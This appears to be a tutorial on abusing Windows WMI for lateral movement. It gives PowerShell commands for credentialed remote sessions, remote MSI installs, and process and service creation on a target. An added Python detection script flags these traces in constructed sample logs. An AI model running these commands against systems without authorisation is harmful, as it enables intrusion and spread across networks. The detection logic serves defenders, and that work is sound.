WMI
Windows Management Instrumentation (WMI) is Windows' implementation of Web-Based Enterprise Management (WBEM), an enterprise standard for accessing management information across devices. WMI allows administrators to perform standard management tasks, and attackers can abuse the same capability to perform lateral movement.
Connecting to WMI from PowerShell
Before we can connect to WMI using PowerShell commands, we need to create a PSCredential object holding our user name and password. We store this object in the $credential variable.
$username = 'USERNAME';
$password = 'PASSWORD';
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
We can then establish a WMI session using one of two protocols, DCOM or WSMAN.
DCOM: RPC over IP will be used for connecting to WMI. This protocol uses port 135/TCP and ports 49152-65535/TCP.
WSMAN: WinRM will be used for connecting to WMI. This protocol uses port 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS).
- DCOM
$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-CimSession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
- WSMAN
$Opt = New-CimSessionOption -Protocol WSMAN
$Session = New-CimSession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
Installing MSI Packages
Invoke-CimMethod
MSI is a file format used for installers. If we can copy an MSI package to the target system, we can use WMI to install it for us. Once the MSI file is on the target system, we install it by invoking the Install method of the Win32_Product class through WMI.
Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\INSTALLER.msi"; Options = ""; AllUsers = $false}
Remote Process Creation
Invoke-CimMethod
We can remotely spawn a process from PowerShell by sending a WMI request to the Create method of the Win32_Process class; the process is spawned on the target through the WMI session.
$Command = "Command To Run";
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
CommandLine = $Command
}
Remote Service Creation
Invoke-CimMethod
We can also create a service on the target whose binary path is the command we want to run, using the Create method of the Win32_Service class, and then start, stop and delete it through the same session.
# Create the service (ServiceType 16 = runs in its own process)
Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
Name = "ServiceName";
DisplayName = "ServiceName";
PathName = "Command To Run";
ServiceType = [byte]::Parse("16");
StartMode = "Manual"
}
# Retrieve the service instance so we can invoke methods on it
$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -Filter "Name LIKE 'ServiceName'"
# Start
Invoke-CimMethod -InputObject $Service -MethodName StartService
# Stop
Invoke-CimMethod -InputObject $Service -MethodName StopService
# Delete
Invoke-CimMethod -InputObject $Service -MethodName Delete
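As an added defensive example (not part of the original page), the following Python script runs simple detection logic over constructed log records for the two techniques above: a process whose parent is WmiPrvSE.exe is the footprint left on the target by the Win32_Process Create call, and a System event 7045 (service installed) whose binary path is a bare command line rather than an executable path is what the Win32_Service Create call leaves behind. The record field names and the sample events are assumptions chosen to resemble Sysmon Event ID 1 and Windows event 7045.

```python
import re

# Constructed sample records (assumed field names), one per line of an imagined export.
SAMPLE_EVENTS = [
    {"event_id": 1, "host": "WS01", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c whoami", "user": "CORP\\svc_admin",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"event_id": 1, "host": "WS01", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe", "user": "CORP\\alice",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"event_id": 7045, "host": "WS01", "service_name": "ServiceName",
     "image_path": "cmd.exe /c whoami", "start_type": "demand start",
     "account": "LocalSystem"},
    {"event_id": 7045, "host": "WS01", "service_name": "Sysmon64",
     "image_path": r"C:\Windows\Sysmon64.exe", "start_type": "auto start",
     "account": "LocalSystem"},
]

# Win32_Process Create runs the child under the WMI provider host.
WMI_PROVIDER_HOST = re.compile(r"\\wbem\\wmiprvse\.exe$", re.IGNORECASE)

# A legitimate service binary is a drive-letter path to an .exe or .sys, optionally
# quoted, optionally followed by arguments. Anything else (e.g. "cmd.exe /c ...")
# is a strong hint that the service was created only to run a command.
PLAIN_BINARY_PATH = re.compile(r'^"?[a-z]:\\[^"]+\.(exe|sys)"?(\s|$)', re.IGNORECASE)


def classify(event):
    """Return a finding string for a suspicious record, or None."""
    if event.get("event_id") == 1 and WMI_PROVIDER_HOST.search(event.get("parent_image", "")):
        return f"wmi-process-create: {event['command_line']} as {event['user']}"
    if event.get("event_id") == 7045:
        path = event.get("image_path", "")
        if not PLAIN_BINARY_PATH.match(path):
            return f"suspicious-service-install: {event['service_name']} -> {path}"
    return None


def scan(events):
    """Run classify() over every record and collect (host, finding) pairs."""
    findings = []
    for event in events:
        hit = classify(event)
        if hit:
            findings.append((event["host"], hit))
    return findings


if __name__ == "__main__":
    for host, finding in scan(SAMPLE_EVENTS):
        print(host, finding)
```

Correlating these host findings with inbound connections to 135/TCP plus a high port (DCOM) or 5985/5986/TCP (WSMAN) from a workstation that is not a management host turns a hint into a solid alert.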